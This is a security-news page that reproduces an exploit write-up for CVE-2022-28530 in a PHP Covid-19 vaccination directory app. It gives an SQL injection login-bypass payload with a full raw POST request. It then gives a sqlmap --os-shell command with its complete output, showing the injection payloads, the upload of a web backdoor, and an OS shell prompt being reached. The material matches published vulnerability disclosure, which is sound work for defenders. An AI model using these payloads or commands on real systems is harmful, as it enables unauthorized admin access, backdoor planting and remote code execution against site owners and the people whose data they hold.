Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28530: Covid-19 Directory On Vaccination System 1.0 SQL Injection ≈ Packet Storm

Sourcecodester Covid-19 Directory on Vaccination System 1.0 is vulnerable to SQL Injection via cmdcategory.

CVE
#sql#web#linux#apache#js#php#backdoor#rce#nginx#auth#firefox
# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, Linux1- Go to following url. >> http://localhost/covid-19-vaccination/admin/login.php2- We can login succesfully with SQL bypass method.**** Username = admin ' or "a" or '**** password = anything ###############################################POST /covid-19-vaccination/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 63Origin: http://localhostConnection: closeReferer: http://localhost/covid-19-vaccination/admin/login.phpCookie: PHPSESSID=dras0itihsadtdkkkv7gv4hf67Upgrade-Insecure-Requests: 1txtusername=admin+%27+or+%22a%22+or+%27&txtpassword=1&btnlogin=--------------------------# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - 'cmdcategory' SQL Injection# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, LinuxThe Covid-19 Directory on Vaccination System is vulnerable to SQL Injection that leads to Remote Code Execution.Sqlmap command :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell Now you have a web shell uploaded to the server :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell         ___       __H__                                                                                                                                                  ___ ___[,]_____ ___ ___  {1.6.3#stable}                                                                                                                     |_ -| . [.]     | .'| . |                                                                                                                                    |___|_  [,]_|_|_|__,|  _|                                                                                                                                          |_|V...       |_|   https://sqlmap.org                                                                                                                 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 00:35:27 /2022-03-28/[00:35:31] [INFO] resuming back-end DBMS 'mysql' [00:35:31] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: cmdcategory (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cmdcategory=Private') AND 3773=3773-- fUxB    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cmdcategory=Private') AND (SELECT 9765 FROM (SELECT(SLEEP(5)))DnRk)-- LWnB---[00:35:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.1.2, Apache 2.4.52back-end DBMS: MySQL 5 (MariaDB fork)[00:35:32] [INFO] going to use a web backdoor for command prompt[00:35:32] [INFO] fingerprinting the back-end DBMS operating system[00:35:32] [INFO] the back-end DBMS operating system is Linuxwhich web application language does the web server support?[1] ASP[2] ASPX[3] JSP[4] PHP (default)> 4do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n[00:36:09] [WARNING] unable to automatically retrieve the web server document rootwhat do you want to use for writable directory?[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)[2] custom location(s)[3] custom directory list file[4] brute force search> 2please provide a comma separate list of absolute directory paths: /opt/lampp/htdocs/covid-19-vaccination/[00:36:30] [WARNING] unable to automatically parse any web server path[00:36:30] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/covid-19-vaccination/' via LIMIT 'LINES TERMINATED BY' method[00:36:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)[00:36:30] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[00:36:31] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpumlrg.php[00:36:31] [WARNING] unable to upload the file through the web file stager to '/opt/lampp/htdocs/covid-19-vaccination/'[00:36:31] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different serversdo you want to try the same method used for the file stager? [Y/n] y[00:36:33] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpbwipl.php[00:36:33] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell>

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907